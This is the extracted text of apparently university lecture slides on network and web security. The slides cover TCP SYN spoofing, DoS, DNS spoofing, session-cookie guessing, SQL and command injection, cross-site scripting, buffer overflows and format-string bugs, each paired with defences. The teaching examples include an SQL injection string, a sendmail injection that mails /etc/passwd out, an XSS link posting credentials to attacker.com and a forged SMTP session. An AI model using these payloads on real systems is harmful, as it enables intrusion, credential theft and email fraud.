• The target sends the ACK with its ISNs to
the trusted host T
• The attacker after the expected time
sends the ACK with predicted ISNs’
29. 29
Launching a SYN Attack
SYN = ISNX, SRC_IP = T
SYN = ISNS, ACK(ISNX)
ACK(ISNS), SRC_IP = T
SRC_IP = T, nasty_data
attacker server trusted host (T)
30. 30
What about the ACK for T?
• If the ACK is received by the trusted host T
– It will reject it, as no request for a connection was made
by it
– RST will be sent and the server drops the connection
BUT!!!
• The attacker can either launch this attack when T
is down
• Or launch some sort of DoS attack on T
– So that it can’t reply
31. 31
TCP SYN Attack – How to
Guess ISNS?
– ISNS’ (Attacker’s ISN) depends on ISNS and
Dt
– Dt can be estimated from the round trip time
– Assume Dt can be estimated with 10 ms
precision
attacker server
Dt
32. 32
TCP SYN Attack – How to
Guess ISNS?
• Attacker has an uncertainty of 1280
in the possible value for ISNS’
• Assume each trial takes 5 s
• The attacker has a reasonable
likelihood of succeeding in 6400 s and
a near-certainty within one day!
33. 33
How to Prevent it?
• Can be prevented by properly
configuring the firewall
– Do not allow any communication from
outside using the address of some
internal network
34. 34
TCP SYN Flood
• Attacker’s goal is to
overwhelm the
destination machine
with SYN packets
with spoofed IP
• This results in:
– The server’s
connection queue
filling up causing
DoS Attack
– Or even if queue is
large enough, all
ports will be busy
and the service
could not be
provided by the
server
C S
SYNC1 Listening
Store data
SYNC2
SYNC3
SYNC4
SYNC5
35. 35
How to Avoid TCP SYN Flood
• Decrease the wait time for half open
connection
• Do not store the connection information
• Use SYN cookies as sequence numbers
during connection setup
• SYN cookie is some function applied on
– Dest IP, Source IP, Port numbers, Time
and a secret number
36. 36
TCP Congestion Control
• If packets are lost, assume congestion
– Reduce transmission rate by half, repeat
– If loss stops, increase rate very slowly
Design assumes routers blindly obey this policy
Source
Destination
37. 37
TCP Congestion Control-
Competition
• Amiable source A yields to boisterous source B
– Both senders experience packet loss
– Source A backs off
– Source B disobeys protocol, gets better results!
Source A
Source B
Destination
Destination
38. 38
DoS-Denial of Service
Attacks
• Attempts to prevent the victim from being
able to establish connections
• Accomplished by involving the victim in
heavy processing
– like sending the TCP SYN packets to all
ports of the victim and avoiding new
connection establishment
• DoS attacks are much easier to accomplish
than gaining administrative access
39. 39
Exploiting Ping Command for
Smurf DoS Attack
• Send ping request to subnet-directed brdcst addr
with spoofed IP (ICMP Echo Req)
• Lots of responses:
– Every host on target network generates a ping reply
(ICMP Echo Reply) to victim
– Ping reply stream can overload victim
gateway
DoS
Source
DoS
Target
1 ICMP Echo Req
Src: Dos Target
Dest: brdct addr
3 ICMP Echo Reply
Dest: Dos Target
40. 40
Smurf DoS Attack
Prevention
• Have adequate bandwidth and redundant
paths
• Filter ICMP messages to reject external
packets to broadcast address
• Any other approach ?
41. 41
FTP – File Transfer Protocol
user
user
interface
protocol
interpreter
data
transfer
function
file system
protocol
interpreter
data
transfer
function
file system
client
server
data connection
control connection
(FTP commands and replies)
42. 42
FTP – File Transfer Protocol
• Typical FTP commands:
– RETR filename – retrieve (get) a file from the server
– STOR filename – store (put) a file on the server
– TYPE type – specify file type (e.g., A for ASCII)
– USER username – username on server
– PASS password – password on server
• FTP is a text (ASCII) based protocol
% ftp ftp.case.edu.pk
Connected to ftp.case.edu.pk.
Name: abc
Password: pswd
client server
<TCP connection setup to port 21 of ftp.case.edu.pk >
“220 ftp.case.edu.pk FTP server (version 5.60) ready.”
“USER abc”
“331 Password required for user abc.”
“PASS pswd”
“230 User abc logged in.”
…
43. 43
Problems with FTP
• FTP information exchange is in clear text
– The attacker can easily eavesdrop and get the
secret information
– The attacker can also know the software
version of FTP running to exploit the
vulnerabilities of that particular version
44. 44
FTP Bounce Scans
• FTP has a feature to open connection with victim
machine on the request from attacker machine
• Machine A (Attacker) can request to check for
the open ports on the target machine X (Victim)
• Newer version of FTP does not support
this forwarding feature
Attacker
FTP Server
Victim to be
scanned
45. 45
Telnet
• Provides remote login service to users
• Works between hosts that use different operating
systems
• Uses option negotiation between client and server
to determine what features are supported by both
ends
Telnet client Telnet server
terminal
driver
TCP/IP
pseudo-
terminal
driver
TCP/IP
login shell
user
kernel kernel
TCP connection
46. 46
Telnet Session Example
• Single character at a time
% telnet ahost.com.pk
Connected to ahost.epfl.ch.
Escape character is ‘^]’.
Login: s
client server
<TCP connection setup to port 23 of ahost.com.pk>
<Telnet option negotiation>
“UNIX(r) System V Release 4.0”
“Login:”
“s”
“Password:”
…
Login: st
“t”
Login: student
“t”
Password: c
“c”
…
Password: case123
“3”
<OS greetings and shell prompt, e.g., “%”>
…
…
…
47. 47
Problems with Telnet
• Information exchange is in clear text
– The attacker can easily eavesdrop and
get the information like username and
passwords
– The attacker can also know the version
to exploit the vulnerabilities of that
particular version
48. 48
SMTP – Simple Mail
Transfer Protocol
user
agent
local
MTA
mails to
be sent
user
sending host
relay
MTA
user
agent
local
MTA
user
mailbox
user
receiving host
relay
MTA
relay
MTA
TCP port 25
TCP connection SMTP
SMTP
SMTP
SMTP
49. 49
SMTP
• SMTP is a text (ASCII) based protocol
• MTA transfers mail from the user to
the destination server
• MTA relays are used to relay the mail
from other clients
• MTAs use SMTP to talk to each other
• All the messages are spooled before
sending
50. 50
SMTP Message Flow
sending MTA (rivest.case.edu.pk) receiving MTA (shamir.care.com.pk)
“HELO rivest.case.edu.pk.”
“250 shamir.care.com.pk Hello rivest.case.edu.pk., pleased to meet you”
“MAIL from: student1@rivest.case.edu.pk”
“250 student1@rivest.case.edu.pk... Sender ok”
“RCPT to: student2@lca.epfl.ch”
“250 student2@lca.epfl.ch… Recipient ok”
“DATA”
“354 Enter mail, end with a “.” on a line by itself”
<message to be sent>
.
<TCP connection establishment to port 25>
“250 Mail accepted”
“QUIT”
“221 shamir.care.com.pk delivering mail”
51. 51
SMTP Security Problems
• Designed in an era where internet security
was not much of an issue
– No security at the base protocol
• Designed around the idea of “cooperation”
and “trust” between servers
– Susceptible to DoS attacks
• Simply flood a mail server with SMTP
connections or SMTP instructions.
52. 52
SMTP Security Problems
• SMTP does not provide any protection of e-
mail messages
– Does not ask sender to authenticate itself.
– Messages can be read and modified by any
of the MTAs involved
– Fake messages can easily be generated (e-
mail forgery)
– Does not check what and from whom it is
relaying the message
53. 53
SMTP Security Problems
Example
% telnet frogstar.hit.com.pk 25
Trying...
Connected to frogstar.hit.com.pk.
Escape character is ‘^[’.
220 frogstar.hit.com.pk ESMTP Sendmail 8.11.6/8.11.6;
Mon, 10 Feb 2003 14:23:21 +0100
helo abcd.com.pk
250 frogstar.hit.com.pk Hello [152.66.249.32], pleased to meet you
mail from: bill.gates@microsoft.com
250 2.1.0 bill.gates@microsoft.com... Sender ok
rcpt to: user@ebizlab.hit.com.pk
250 2.1.5 user@ebizlab.hit.com.pk... Recipient ok
data
354 Enter mail, end with "." on a line by itself
Your fake message goes here.
.
250 2.0.0 h1ADO5e21330 Message accepted for delivery
quit
221 frogstar.hit.com.pk closing connection
Connection closed by foreign host.
%
54. 54
Be Careful, Though!
Return-Path: <bill.gates@microsoft.com>
Received: from frogstar.hit.com.pk (root@frogstar.hit.com.pk
[152.66.248.44])
by shamir.ebizlab.hit.com.pk (8.12.7/8.12.7/Debian-2)
with ESMTP id h1ADSsxG022719
for <user@ebizlab.hit.com.pk>; Mon, 10 Feb 2003 14:28:54 +0100
Received: from abcd.com.pk ([152.66.249.32])
by frogstar.hit.com.pk (8.11.6/8.11.6) with SMTP id h1ADO5e21330
for user@ebizlab.hit.com.pk; Mon, 10 Feb 2003 14:25:41 +0100
Date: Mon, 10 Feb 2003 14:25:41 +0100
From: bill.gates@microsoft.com
Message-Id: <200302101325.h1ADO5e21330@frogstar.hit.com.pk>
To: undisclosed-recipients:;
X-Virus-Scanned: by amavis-dc
Status:
Your fake message goes here.
56. 56
DNS – Domain Name Server
• The DNS is a distributed database that
provides mapping between hostnames and
IP addresses
• The DNS name space is hierarchical
– Top level domains: com, edu, gov, int, mil,
net, org, ae, …, pk, … zw
– Top level domains may contain second
level domains
e.g., edu within pk, co within uk, …
– Second level domains may contain third
level domains, etc.
57. 57
Domain Name Server
• Usually (not always) a name server knows
the IP address of the top level name
servers
• If a domain contains sub-domains, then the
name server knows the IP address of the
sub-domain name servers
• When a new host is added to a domain, the
administrator adds the (hostname, IP
address) mapping to the database of the
local name server
58. 58
DNS – Domain Name Server
– A single DNS reply may include several
(hostname, IP address) mappings (Resource
Records)
– Received information is cached by the name
server
application
local
name srv
top level
name srv
name srv
in pk
name srv
in edu.pk
name srv
in case.edu.pk
ce.case.edu.pk = ? ce.case.edu.pk = ?
IP of ns in pk
152.66.248.44
59. 59
DNS spoofing
• The cache of a DNS name server is
poisoned with false information
• How to do it?
– Assume that the attacker wants
www.anything.com.pk to map to his own
IP address 152.66.249.32
60. 60
DNS Spoofing - Approach 1
• Attacker submits a DNS query
“www.anything.com.pk=?” to
ns.victim.com.pk
• A bit later it forges a DNS reply
“www.anything.com.pk=152.66.249.32”
• UDP makes forging easier but the
attacker must still predict the query
ID
61. 61
DNS Spoofing – Approach 2
• Attacker has access to ns.attacker.com.pk
– The attacker modifies its local name server
such that it responds a query
“www.attacker.com.pk=?” with
“www.anything.com.pk=152.66.249.32”
– The attacker then submits a query
“www.attacker.com.pk=?” to ns.victim.com.pk
– ns.victim.com.pk sends the query
“www.attacker.com.pk=?” to ns.attacker.com.pk
– ns.attacker.com.pk responds with
“www.anything.com.pk=152.66.249.32”
63. 63
Web Security – Browser
Side Risks
• Obtaining a valid browser
– IE usually comes with the OS
– Netscape can be obtained from web sites
– How can you be sure that you are downloading a
genuine copy? (remember DNS spoofing)
– A fake browser can look like a genuine one, but
it can
• Obtain and send passwords typed in by the user
• Downgrade browser security (e.g., reduce key length
used in SSL)
64. 64
Web Forms
• Used to send data from the user to the
server (e.g., online applications, queries to a
database, etc.)
• If pure HTTP is used, then the data is sent
in clear
• Sensitive information can be eavesdropped
and/or modified
65. 65
Helper Applications
• The browser cannot handle all kind of
downloaded data
• It invokes an external program (the helper)
on the user’s machine with the downloaded
data as parameter
• e.g., to display a PostScript file, it may
pass it to GhostView
• Downloaded content can be dangerous (e.g.,
MS Word and Excel files may contain
macro viruses)
66. 66
Mobile Code
Java Applets
• Normally run within a controlled
environment (sandbox)
• Access to local resources is strictly
controlled by a security manager
• However, an applet may escape from the
sandbox due to some bugs in the
implementation of the Java Virtual
Machine
• Several such bugs have been discovered,
reported, and fixed
• What guarantees that there’s no more?
67. 67
ActiveX Controls
• A Microsoft approach to mobile code
• ActiveX controls are executables that run directly
on the machine (there’s no sandbox)
• ActiveX controls can be signed and declared safe
by their creators
• But an ActiveX control declared safe may turn out
to be dangerous
– Compaq signed a control safe which allowed for remote
management of servers
– Microsoft signed a control which could write arbitrary
file on the hard disk (it was exploited by a virus
Kak.Worm)
68. 68
JavaScript != Java Applet
• Scripts are interpreted by the browser itself
• Not as powerful as Java (e.g., many attacks
require that the user clicks on a button to activate
the malicious code)
• Successful attacks reported include history
tracking, stealing files, helping Java applets to
bypass firewalls, etc.
69. 69
Cookies
• A cookie is a (name, value) pair
• Cookies are set by web servers and stored by web
browsers
• A cookie set by a server is sent back to the server
when the browser visits the server again
• Used to create “HTTP sessions” (session state
information is stored in cookies)
70. 70
Cookies: Example
• If cookies are sent in clear, then they can be
eavesdropped and used to hijack an “HTTP
session”
• Cookies can be used to track what sites the user
visits (can lead to serious privacy violation!)
– Many sites use third party advertisements
– The third party can set a cookie that identifies the user
get index.html
content of index.html + set-cookie: sessionID=123456789
get nextlink.html + cookie: sessionID=123456789
…
client server
71. 71
Cookies: Example
• This cookie is sent to the third party each time an
ad is downloaded by the user’s browser along with
the address of the page that contains the link to
the ad (the “referrer” field of the HTTP header
contains this address)
browser
thirdparty.com
<html>
…
<img src=“http://thirdparty.com/ad_server.asp”>
…
</html>
index.html
whatever.com
get ad_server.asp +
referrer=“whatever.com/index.html” +
cookie: user=123456789
72. 72
[1] https://www.mia-banca.it
[2] Sent authentication form over HTTPS
Mario Rossi
-- Authentication process --
Case-study: home-banking
application
Web
Application
73. 73
[1] https://www.mia-banca.it
[2] Send authentication form over HTTPS
[3] Insert username/password via HTTPS
[4] Personal Welcome page and Set Cookie
Mario Rossi
-- Authentication process --
Credential verify: if ok
client authenticated
Cookie generation
authentication
token
Cookie=TWFyaW8123
Username/password
Case-study: home-banking
application
Web
Application
74. 74
Mario Rossi --Following request--
[6] Response with user data
Authentication
token
Cookie=TWFyaW8123 Cookie verifing:
Identify user
Send data to user
[5] Request “movimenti”
Cookie=TWFyaW8123
Case-study: home-banking
application
Web
Application
75. 75
[4] Welcome page and Set Cookie=TWFyaW8123
Mario Rossi
--Authentication process-
Authentication
Token
Cookie=TWFyaW8123
Audit: cookies collection
Web
Application
Credential verify: if ok
client authenticated
Cookie generation
[3] Insert username/password via HTTPS
76. 76
Audit: cookies collect
(2)
1st Authentication:
User = Mario Rossi; password=12aB45cD:
Cookie=TWFyaW8123
2nd Authentication :
User = Mario Rossi; password=12aB45cD:
Cookie=TWFyaW8125
3rd Authentication :
User = Mario Rossi; password=12aB45cD:
Cookie=TWFyaW8127
Cookie Guessable: Cookie=TWFyaW8129
77. 77
Mario Rossi --Following request--
[6] Send Mario Verdi data
Authentication
Token
Cookie=TWFyaW8179 Cookie verify:
TWFyaW8179
Identify user Mario Verdi
Send Mario Verdi data
[5] Request “movimenti”
Cookie=TWFyaW8179
Session web hacking:
identity theft
Web
Application
78. 78
Possible solutions
For a robust session management, it is necessary to protect:
User credentials AND
User authentication token (cookie, session ID)
Authentication token should be:
Unique for each session
Not predictable
Resistant to reverse-engineering
79. 79
Cookies: Example
• http://www.musicvision.com/network_privacy_poli
cy.html
Third Party Advertising
We use Maxworldwide and other third-party advertising companies to serve ads
when you visit our Web site. These companies may use information (not including
your name, address, email address or telephone number) about your visits to
this and other Web sites in order to provide advertisements on this site and
other sites about goods and services that may be of interest to you. If you would
like more information about this practice and to know your choices about not
having this information used by these companies, please click here
Third Party Cookies
In the course of serving advertisements to this site, our third-party advertiser
may place or recognize a unique "cookie" on your browser.
84. 84
URL Manipulation (contd)
• GET request sends important parameters on the URL
• The parameters can be manipulated to give undesired results
• The GET requests are stored in the browser history
• Impact is HIGH
• Variants work on any user input on web page, hidden values
or information stored in cookies.
http://www.paladiontest.com/example?accountnumber
=12345&debitamount=1
85. 85
URL Manipulation - Solution
• The best solution is to avoid sending
critical parameters in a query string
• Validate with session token
• All sensitive data sent in the query string
must be cryptographically protected.
86. 86
Web Security – Server Side
Risks
• Interactive web sites are based on forms
and scripts
– Forms are written in html
– The user fills the form and clicks on a button to
submit it
– This creates a request to the server that
contains the data typed in by the user
– The request launches a script on the server
that processes the data supplied by the user
(may return a page that is created using the
supplied data)
87. 87
Unexpected User Input
• Unexpected user input may have
unexpected effects
– Special characters
– Too much data (may cause buffer overflow)
• At best, the server crashes
• At worst, the attacker gains control over
the server
88. 88
Unexpected User Input:
Example I
• An example: password based user authentication
– Assume the following server side script is used to check the
supplied username and password:
query$ = ‘SELECT name, pass FROM database WHERE name =
“ ’ + name$ + ‘ ” AND
pass = “ ’ + pass$ + ‘ ” ’
Result = SQLquery(query$)
if Result <> 0 then OK
– With name$ = username and pass$ = passwd
SELECT name, pass FROM database WHERE name =
“username” AND pass = “passwd”
– With name$ = username” OR TRUE OR name = “ and pass$ =
passwd
SELECT name, pass FROM database WHERE name =
“username” OR TRUE OR name = “”
AND pass = “passwd”
90. 90
Unexpected User Input:
Example II
• User can type her e-mail address in a form and the
server sends her the latest public company report
– Assume the following perl script is used on the
server
system(“sendmail $address < report.doc”);
– With $address = username@case.edu.pk
system(“sendmail username@case.edu.pk < report.doc”);
– With $address = username@case.edu.pk <
/etc/passwd | sendmail username@case.edu.pk
system(“sendmail username@case.edu.pk < /etc/passwd |
sendmail
username@case.edu.pk < report.doc”);
91. 91
Cross Site Scripting Example
`
User
Bank.com
Attacker.com
http://bank.com/login/
Webpage + Cookies
Internet
Banking
Cookie
Malicious link on
webpage or email with
malicious link
Malicious Link
http://bank.com/account.jsp? <SCRIPT>Send cookie to attacker.com
Reflected Code
<SCRIPT>Send Cookie to
attacker.com</SCRIPT>
Internet
Banking
Cookie
Executed
92. 92
Cross Site Scripting
• Attacker arranges that the victim receives
a malicious script from a trusted server
• Example:
– UserX places the script in the “guest
book” of UserB
– UserA visits the “guest book” of UserB
– His browser downloads and runs UserX’s
script
93. 93
Cross Site Scripting:
Example
• Requesting a non-existent file abcd.html from
some web servers, they return error messages
like:
“The requested file abcd.html cannot be found on the server.”
– Attacker can place the following link on a page:
< a href=“http://trusted.server.com/is protected. The server
needs you to login.<br><form
action="http://attacker.com/cgiscript.cgi"
method="post">Username: <input
type="text"
name="name"><br>Password: <input
type="password"
name="pass"><br><input type="submit"
value="Login"></form><br><br><br><br><br><br><br>
<br>
<br><br><br><br><br><br><br><br><br><br><br><br><br><br><br>”
>
94. 94
What Will Happen?
• Alice clicks on the link
• HTTP request is sent to trusted.server.com
• Server returns the usual error page, but it will
look like a login window...
The requested file is protected. The server needs you to log in.
Username:
Password:
Login
cannot be found on the server.
browser window
95. 95
Cross-Site Scripting
Defenses
• Remove from user input all characters that
are meaningful in scripting languages:
– =<>"'();
– You must do this filtering on the server side
– You cannot do this filtering using Javascript on
the client, because the attacker can get around
such filtering
96. 96
Cross-Site Scripting
Defenses (cont..)
• More generally, on the server-side, your
application must filter user input to
remove:
– Quotes of all kinds (', ", and `)
– Semicolons (;), Asterisks (*), Percents (%),
Underscores (_)
– Other shell/scripting metacharacters
(=&|*?~<>^()[]{}$nr )
• Define characters that are ok (alpha and
numeric), and filter everything else out
97. 97
• Extremely common bug.
– First major exploit: 1988 Internet Worm. fingerd.
• 15 years later: 50% of all CERT advisories:
– 1998: 9 out of 13
– 2001: 14 out of 37
– 2003: 13 out of 28
• Often leads to total compromise of host.
Buffer overflows
98. 98
What are buffer overflows?
• Suppose a web server contains a function:
void func(char *str) {
char buf[128];
strcpy(buf, str);
do-something(buf);
}
• When the function is invoked the stack looks like:
• What if *str is 136 bytes long? After
strcpy:
str
ret-addr
sfp
buf
top
of
stack
str
top
of
stack
*str ret
99. 99
Possible Result Hacker’s Goal
Access violation
To perform denial of service
attacks against servers
Instability To disrupt the normal operation
of software
Code Injection
To gain privileges for their own
code
To exploit vital business data
To perform destructive actions
Possible Results of Buffer
Overruns
100. 100
void UnSafe (const char* uncheckedData)
{
int anotherLocalVariable;
strcpy (localVariable, uncheckedData);
}
char localVariable[4];
Stack-Based Buffer Overrun
Example
Top of Stack
char[4]
int
Return
address
101. 101
Heap Overruns
• Overwrite data stored on the heap
• Are harder to exploit than a buffer
overrun Data
Pointer
Data
Data
Pointer
Pointer
strcpy xxxxxxx
xxxxxxx
102. 102
Preventing overflow attacks
• Main problem:
– strcpy(), strcat(), sprintf() have no range checking.
– “Safe” versions strncpy(), strncat() are misleading
• strncpy() may leave buffer unterminated.
• strncpy(), strncat() encourage off by 1 bugs.
• Defenses:
– Type safe languages (Java, ML). Legacy code?
– Mark stack as non-execute. Random stack location.
– Static source code analysis.
– Run time checking: StackGuard, Libsafe, SafeC, (Purify).
103. 103
Marking stack as non-
execute
• Basic stack exploit can be prevented by marking
stack segment as non-executable.
• Problems:
– Some apps need executable stack (e.g. LISP
interpreters).
104. 104
Run time checking: StackGuard
• Many many run-time checking techniques …
– Here, only discuss methods relevant to overflow protection.
• Solutions 1: StackGuard (WireX)
– Run time tests for stack integrity.
– Embed “canaries” in stack frames and verify their
integrity prior to function return.
str
ret
sfp
local
top
of
stack
canary
str
ret
sfp
local canary
Frame 1
Frame 2
105. 105
Canary Types
• Random canary:
– Choose random string at program startup.
– Insert canary string into every stack frame.
– Verify canary before returning from function.
– To corrupt random canary, attacker must learn
current random string.
• Terminator canary:
Canary = 0, newline, linefeed, EOF
– String functions will not copy beyond terminator.
– Hence, attacker cannot use string functions to
corrupt stack.
106. 106
StackGuard (Cont.)
• StackGuard implemented as a GCC patch.
– Program must be recompiled.
• Minimal performance effects: 8% for Apache.
• Newer version: PointGuard.
– Protects function pointers and setjmp
buffers by placing canaries next to them.
– More noticeable performance effects.
– Note: Canaries don’t offer fullproof protection.
– Some stack smashing attacks can leave canaries
untouched.
107. 107
StackGuard variants -
ProPolice
• ProPolice (IBM) - gcc 3.4.1.
– Rearrange stack layout to prevent ptr overflow.
args
ret addr
SFP
CANARY
arrays
Local variables
Stack
Growth
No arrays or pointers
Ptrs, but no arrays
String
Growth
108. 108
Run time checking: Libsafe
• Solutions 2: Libsafe (Avaya Labs)
– Dynamically loaded library.
– Intercepts calls to strcpy (dest, src)
• Validates sufficient space in current stack frame:
|frame-pointer – dest| > strlen(src)
• If so, does strcpy.
Otherwise, terminates application.
dest
ret-addr
sfp
top
of
stack
src buf ret-addr
sfp
libsafe main
110. 110
Format string problem
int func(char *user) {
fprintf( stdout, user);
}
Problem: what if user = “%s%s%s%s%s%s%s” ??
– Most likely program will crash: DoS.
– If not, program will print memory contents. Privacy?
– Full exploit using user = “%n”
Correct form:
int func(char *user) {
fprintf( stdout, “%s”, user);
}
111. 111
Vulnerable functions
Any function using a format string.
Printing:
printf, fprintf, sprintf, …
vprintf, vfprintf, vsprintf, …
Logging:
syslog, err, warn
112. 112
Overflow using format
string
char errmsg[512], outbuf[512];
sprintf (errmsg, “Illegal command: %400s”, user);
sprintf( outbuf, errmsg );
• What if user = “%500d <nops> <shellcode>”
– Bypass “%400s” limitation.
– Will ovreflow outbuf.